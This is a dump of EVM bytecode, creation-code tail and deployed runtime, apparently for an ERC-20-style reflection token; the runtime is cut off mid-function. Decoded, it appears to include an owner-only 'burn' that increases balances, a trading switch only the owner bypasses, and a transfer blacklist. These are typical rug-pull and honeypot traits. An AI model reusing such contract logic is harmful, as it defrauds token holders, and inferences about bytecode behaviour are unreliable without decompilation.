957607f821691505b6020821081141562000cd05762000ccf62000dba565b5b50919050565b600062000ce38262000c60565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82141562000d195762000d1862000d5c565b5b600182019050919050565b600062000d318262000c60565b915062000d3e8362000c60565b92508262000d515762000d5062000d8b565b5b828206905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f416d6f756e74206d757374206265206c657373207468616e20746f74616c207260008201527f65666c656374696f6e7300000000000000000000000000000000000000000000602082015250565b62000e888162000c2c565b811462000e9457600080fd5b50565b612e028062000ea76000396000f3fe608060405234801561001057600080fd5b506004361061014d5760003560e01c80634549b039116100c35780639dc29fac1161007c5780639dc29fac146103b85780639f08b319146103d4578063a457c2d7146103f0578063a9059cbb14610420578063dd62ed3e14610450578063ebad8f16146104805761014d565b80634549b039146102f45780635ff1b1811461032457806370a0823114610342578063715018a6146103725780638da5cb5b1461037c57806395d89b411461039a5761014d565b806323b872dd1161011557806323b872dd146101f85780632d3e69ea146102285780632d83811914610246578063313ce56714610276578063395093511461029457806343ab662c146102c45761014d565b8063053ab1821461015257806306fdde031461016e578063081d2b3c1461018c578063095ea7b3146101aa57806318160ddd146101da575b600080fd5b61016c6004803603810190610167919061225b565b61048a565b005b610176610604565b6040516101839190612540565b60405180910390f35b610194610696565b6040516101a191906124e1565b60405180910390f35b6101c460048036038101906101bf919061221b565b6106bc565b6040516101d19190612525565b60405180910390f35b6101e26106da565b6040516101ef91906126e2565b60405180910390f35b610212600480360381019061020d91906121c8565b6106eb565b60405161021f9190612525565b60405180910390f35b6102306107c4565b60405161023d9190612525565b60405180910390f35b610260600480360381019061025b919061225b565b6107db565b60405161026d91906126e2565b60405180910390f35b61027e610849565b60405161028b91906126fd565b60405180910390f35b6102ae60048036038101906102a9919061221b565b610860565b6040516102bb9190612525565b60405180910390f35b6102de60048036038101906102d9919061215b565b610913565b6040516102eb9190612525565b60405180910390f35b61030e60048036038101906103099190612288565b610969565b60405161031b91906126e2565b60405180910390f35b61032c6109f2565b60405161033991906126e2565b60405180910390f35b61035c6004803603810190610357919061215b565b6109fc565b60405161036991906126e2565b60405180910390f35b61037a610a45565b005b610384610b98565b60405161039191906124e1565b60405180910390f35b6103a2610bc1565b6040516103af9190612540565b60405180910390f35b6103d260048036038101906103cd919061221b565b610c53565b005b6103ee60048036038101906103e9919061215b565b610d81565b005b61040a6004803603810190610405919061221b565b610fad565b6040516104179190612525565b60405180910390f35b61043a6004803603810190610435919061221b565b61107a565b6040516104479190612525565b60405180910390f35b61046a60048036038101906104659190612188565b611098565b60405161047791906126e2565b60405180910390f35b61048861111f565b005b60006104946112a2565b9050600560008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610523576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161051a906126c2565b60405180910390fd5b600061052e836112aa565b50505050905061058681600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461125890919063ffffffff16565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506105de81600a5461125890919063ffffffff16565b600a819055506105f98360085461130290919063ffffffff16565b600881905550505050565b6060600d8054610613906128d1565b80601f016020809104026020016040519081016040528092919081815260200182805461063f906128d1565b801561068c5780601f106106615761010080835404028352916020019161068c565b820191906000526020600020905b81548152906001019060200180831161066f57829003601f168201915b5050505050905090565b600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60006106d06106c96112a2565b8484611360565b6001905092915050565b600068a2a15d09519be00000905090565b60006106f884848461152b565b6107b9846107046112a2565b6107b485604051806060016040528060288152602001612d8060289139600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061076a6112a2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611c2f9092919063ffffffff16565b611360565b600190509392505050565b6000600960009054906101000a900460ff16905090565b6000600a54821115610822576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161081990612582565b60405180910390fd5b600061082c611c93565b9050610841818461120e90919063ffffffff16565b915050919050565b6000600f60009054906101000a900460ff16905090565b600061090961086d6112a2565b84610904856004600061087e6112a2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461130290919063ffffffff16565b611360565b6001905092915050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600068a2a15d09519be000008311156109b7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ae906125e2565b60405180910390fd5b816109d65760006109c7846112aa565b505050509050809150506109ec565b60006109e1846112aa565b505050915050809150505b92915050565b6000600854905090565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610a4d6112a2565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ada576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ad190612622565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600e8054610bd0906128d1565b80601f0160208091040260200160405190810160405280929190818152602001828054610bfc906128d1565b8015610c495780601f10610c1e57610100808354040283529160200191610c49565b820191906000526020600020905b815481529060010190602001808311610c2c57829003601f168201915b5050505050905090565b610c5b6112a2565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ce8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdf90612622565b60405180910390fd5b610d3a81600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461130290919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b610d896112a2565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e16576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0d90612622565b60405180910390fd5b60011515600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615151415610ecc576000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610faa565b6001600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055507f1d2288ff481fd28dcc877dd640cc5729f3d0a091e9e2bfff38f6214c00e2ae5f81600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16604051610fa19291906124fc565b60405180910390a15b50565b6000611070610fba6112a2565b8461106b85604051806060016040528060258152602001612da86025913960046000610fe46112a2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611c2f9092919063ffffffff16565b611360565b6001905092915050565b600061108e6110876112a2565b848461152b565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6111276112a2565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146111b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111ab90612622565b60405180910390fd5b60011515600960009054906101000a900460ff16151514156111f0576000600960006101000a81548160ff02191690831515021790555061120c565b6001600960006101000a81548160ff0219169083151502179055505b565b600061125083836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250611cbe565b905092915050565b600061129a83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611c2f565b905092915050565b600033905090565b60008060008060008060006112be88611d21565b9150915060006112cc611c93565b905060008060006112de8c8686611d74565b92509250925082828288889a509a509a509a509a5050505050505091939590929450565b60008082846113119190612734565b905083811015611356576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161134d906125c2565b60405180910390fd5b8091505092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156113d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113c7906126a2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611440576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611437906125a2565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161151e91906126e2565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141561159b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159290612662565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561160b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160290612562565b60405180910390fd5b6000811161164e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161164590612642565b60405180910390fd5b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806116ef5750600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156117385760008114611737576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161172e90612682565b60405180910390fd5b5b60011515600960009054906101000a900460ff161515148061178c575061175d610b98565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b806117c9575061179a610b98565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15611bd357600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156118715750600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611a24576118e281604051806060016040528060268152602001612d5a60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611c2f9092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061197781600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461130290919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611a1791906126e2565b60405180910390a3611bce565b611a9081604051806060016040528060268152602001612d5a60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611c2f9092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611b2581600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461130290919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611bc591906126e2565b60405180910390a35b611c2a565b60011515600960009054906101000a900460ff16151514611c29576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c2090612682565b60405180910390fd5b5b505050565b6000838311158290611c77576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c6e9190612540565b60405180910390fd5b5060008385611c869190612815565b9050809150509392505050565b6000806000611ca0611dd2565b91509150611cb7818361120e90919063ffffffff16565b9250505090565b60008083118290611d05576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cfc9190612540565b60405180910390fd5b5060008385611d14919061278a565b9050809150509392505050565b6000806000611d4e6002611d406103e88761120e90919063ffffffff16565b6120a190919063ffffffff16565b90506000611d65828661125890919063ffffffff16565b90508082935093505050915091565b600080600080611d8d85886120a190919063ffffffff16565b90506000611da486886120a190919063ffffffff16565b90506000611dbb828461125890919063ffffffff16565b905082818395509550955050505093509350939050565b6000806000600a549050600068a2a15d09519be00000905060005b60068054905081101561205657826002600060068481548110611e1357611e126129d9565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541180611f015750816003600060068481548110611e9957611e986129d9565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b15611f1f57600a5468a2a15d09519be000009450945050505061209d565b611faf6002600060068481548110611f3a57611f396129d9565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020548461125890919063ffffffff16565b92506120416003600060068481548110611fcc57611fcb6129d9565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020548361125890919063ffffffff16565b9150808061204e90612903565b915050611ded565b5061207568a2a15d09519be00000600a5461120e90919063ffffffff16565b82101561209457600a5468a2a15d09519be0000093509350505061209d565b81819350935050505b9091565b6000808314156120b45760009050612116565b600082846120c291906127bb565b90508284826120d1919061278a565b14612111576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161210890612602565b60405180910390fd5b809150505b92915050565b60008135905061212b81612d14565b92915050565b60008135905061214081612d2b565b92915050565b60008135905061215581612d42565b92915050565b60006020828403121561217157612170612a08565b5b600061217f8482850161211c565b91505092915050565b6000806040838503121561219f5761219e612a08565b5b60006121ad8582860161211c565b92505060206121be8582860161211c565b9150509250929050565b6000806000606084860312156121e1576121e0612a08565b5b60006121ef8682870161211c565b93505060206122008682870161211c565b925050604061221186828701612146565b9150509250925092565b6000806040838503121561223257612231612a08565b5b60006122408582860161211c565b925050602061225185828601612146565b9150509250929050565b60006020828403121561227157612270612a08565b5b600061227f84828501612146565b91505092915050565b6000806040838503121561229f5761229e612a08565b5b60006122ad85828601612146565b92505060206122be85828601612131565b9150509250929050565b6122d181612849565b82525050565b6122e08161285b565b82525050565b60006122f182612718565b6122fb8185612723565b935061230b81856020860161289e565b61231481612a0d565b840191505092915050565b600061232c602383612723565b915061233782612a1e565b604082019050919050565b600061234f602a83612723565b915061235a82612a6d565b604082019050919050565b6000612372602283612723565b915061237d82612abc565b604082019050919050565b6000612395601b83612723565b91506123a082612b0b565b602082019050919050565b60006123b8601f83612723565b91506123c382612b34565b602082019050919050565b60006123db602183612723565b91506123e682612b5d565b604082019050919050565b60006123fe602083612723565b915061240982612bac565b602082019050919050565b6000612421602983612723565b915061242c82612bd5565b604082019050919050565b6000612444602583612723565b915061244f82612c24565b604082019050919050565b6000612467600083612723565b915061247282612c73565b600082019050919050565b600061248a602483612723565b915061249582612c76565b604082019050919050565b60006124ad602c83612723565b91506124b882612cc5565b604082019050919050565b6124cc81612887565b82525050565b6124db81612891565b82525050565b60006020820190506124f660008301846122c8565b92915050565b600060408201905061251160008301856122c8565b61251e60208301846122d7565b9392505050565b600060208201905061253a60008301846122d7565b92915050565b6000602082019050818103600083015261255a81846122e6565b905092915050565b6000602082019050818103600083015261257b8161231f565b9050919050565b6000602082019050818103600083015261259b81612342565b9050919050565b600060208201905081810360008301526125bb81612365565b9050919050565b600060208201905081810360008301526125db81612388565b9050919050565b600060208201905081810360008301526125fb816123ab565b9050919050565b6000602082019050818103600083015261261b816123ce565b9050919050565b6000602082019050818103600083015261263b816123f1565b9050919050565b6000602082019050818103600083015261265b81612414565b9050919050565b6000602082019050818103600083015261267b81612437565b9050919050565b6000602082019050818103600083015261269b8161245a565b9050919050565b600060208201905081810360008301526126bb8161247d565b9050919050565b600060208201905081810360008301526126db816124a0565b9050919050565b60006020820190506126f760008301846124c3565b92915050565b600060208201905061271260008301846124d2565b92915050565b600081519050919050565b600082825260208201905092915050565b600061273f82612887565b915061274a83612887565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561277f5761277e61294c565b5b828201905092915050565b600061279582612887565b91506127a083612887565b9250826127b0576127af61297b565b5b828204905092915050565b60006127c682612887565b91506127d183612887565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561280a5761280961294c565b5b828202905092915050565b600061282082612887565b915061282b83612887565b92508282101561283e5761283d61294c565b5b828203905092915050565b600061285482612867565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b838110156128bc5780820151818401526020810190506128a1565b838111156128cb576000848401525b50505050565b600060028204905060018216806128e957607f821691505b602082108114156128fd576128fc6129aa565b5b50919050565b600061290e82612887565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156129415761294061294c565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f416d6f756e74206d757374206265206c657373207468616e20746f74616c207260008201527f65666c656374696f6e7300000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b7f416d6f756e74206d757374206265206c657373207468616e20737570706c7900600082015250565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f4578636c75646564206164647265737365732063616e6e6f742063616c6c207460008201527f6869732066756e6374696f6e0000000000000000000000000000000000000000602082015250565b612d1d81612849565b8114612d2857600080fd5b50565b612d348161285b565b8114612d3f57600080fd5b50565b612d4b81612887565b8114612d5657600080fd5b5056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220fab7d4781aece0e7cdc70b5fc542dfcf7aadebed29b7b164089c4125b6b311fa64736f6c634300080600330000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061014d5760003560e01c80634549b039116100c35780639dc29fac1161007c5780639dc29fac146103b85780639f08b319146103d4578063a457c2d7146103f0578063a9059cbb14610420578063dd62ed3e14610450578063ebad8f16146104805761014d565b80634549b039146102f45780635ff1b1811461032457806370a0823114610342578063715018a6146103725780638da5cb5b1461037c57806395d89b411461039a5761014d565b806323b872dd1161011557806323b872dd146101f85780632d3e69ea146102285780632d83811914610246578063313ce56714610276578063395093511461029457806343ab662c146102c45761014d565b8063053ab1821461015257806306fdde031461016e578063081d2b3c1461018c578063095ea7b3146101aa57806318160ddd146101da575b600080fd5b61016c6004803603810190610167919061225b565b61048a565b005b610176610604565b6040516101839190612540565b60405180910390f35b610194610696565b6040516101a191906124e1565b60405180910390f35b6101c460048036038101906101bf919061221b565b6106bc565b6040516101d19190612525565b60405180910390f35b6101e26106da565b6040516101ef91906126e2565b60405180910390f35b610212600480360381019061020d91906121c8565b6106eb565b60405161021f9190612525565b60405180910390f35b6102306107c4565b60405161023d9190612525565b60405180910390f35b610260600480360381019061025b919061225b565b6107db565b60405161026d91906126e2565b60405180910390f35b61027e610849565b60405161028b91906126fd565b60405180910390f35b6102ae60048036038101906102a9919061221b565b610860565b6040516102bb9190612525565b60405180910390f35b6102de60048036038101906102d9919061215b565b610913565b6040516102eb9190612525565b60405180910390f35b61030e60048036038101906103099190612288565b610969565b60405161031b91906126e2565b60405180910390f35b61032c6109f2565b60405161033991906126e2565b60405180910390f35b61035c6004803603810190610357919061215b565b6109fc565b60405161036991906126e2565b60405180910390f35b61037a610a45565b005b610384610b98565b60405161039191906124e1565b60405180910390f35b6103a2610bc1565b6040516103af9190612540565b60405180910390f35b6103d260048036038101906103cd919061221b565b610c53565b005b6103ee60048036038101906103e9919061215b565b610d81565b005b61040a6004803603810190610405919061221b565b610fad565b6040516104179190612525565b60405180910390f35b61043a6004803603810190610435919061221b565b61107a565b6040516104479190612525565b60405180910390f35b61046a60048036038101906104659190612188565b611098565b60405161047791906126e2565b60405180910390f35b61048861111f565b005b60006104946112a2565b9050600560008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610523576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161051a906126c2565b60405180910390fd5b600061052e836112aa565b50505050905061058681600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461125890919063ffffffff16565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506105de81600a5461125890919063ffffffff16565b600a819055506105f98360085461130290919063ffffffff16565b600881905550505050565b6060600d8054610613906128d1565b80601f016020809104026020016040519081016040528092919081815260200182805461063f906128d1565b801561068c5780601f106106615761010080835404028352916020019161068c565b820191906000526020600020905b81548152906001019060200180831161066f57829003601f168201915b5050505050905090565b600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60006106d06106c96112a2565b8484611360565b6001905092915050565b600068a2a15d09519be00000905090565b60006106f884848461152b565b6107b9846107046112a2565b6107b485604051806060016040528060288152602001612d8060289139600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061076a6112a2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611c2f9092919063ffffffff16565b611360565b600190509392505050565b6000600960009054906101000a900460ff16905090565b6000600a54821115610822576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161081990612582565b60405180910390fd5b600061082c611c93565b9050610841818461120e90919063ffffffff16565b915050919050565b6000600f60009054906101000a900460ff16905090565b600061090961086d6112a2565b84610904856004600061087e6112a2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461130290919063ffffffff16565b611360565b6001905092915050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600068a2a15d09519be000008311156109b7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ae906125e2565b60405180910390fd5b816109d65760006109c7846112aa565b505050509050809150506109ec565b60006109e1846112aa565b505050915050809150505b92915050565b6000600854905090565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610a4d6112a2565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ada576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ad190612622565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600e8054610bd0906128d1565b80601f0160208091040260200160405190810160405280929190818152602001828054610bfc906128d1565b8015610c495780601f10610c1e57610100808354040283529160200191610c49565b820191906000526020600020905b815481529060010190602001808311610c2c57829003601f168201915b5050505050905090565b610c5b6112a2565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ce8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdf90612622565b60405180910390fd5b610d3a81600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461130290919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b610d896112a2565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e16576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0d90612622565b60405180910390fd5b60011515600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615151415610ecc576000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610faa565b6001600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055507f1d2288ff481fd28dcc877dd640cc5729f3d0a091e9e2bfff38f6214c00e2ae5f81600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16604051610fa19291906124fc565b60405180910390a15b50565b6000611070610fba6112a2565b8461106b85604051806060016040528060258152602001612da86025913960046000610fe46112a2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611c2f9092919063ffffffff16565b611360565b6001905092915050565b600061108e6110876112a2565b848461152b565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6111276112a2565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146111b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111ab90612622565b60405180910390fd5b60011515600960009054906101000a900460ff1615151415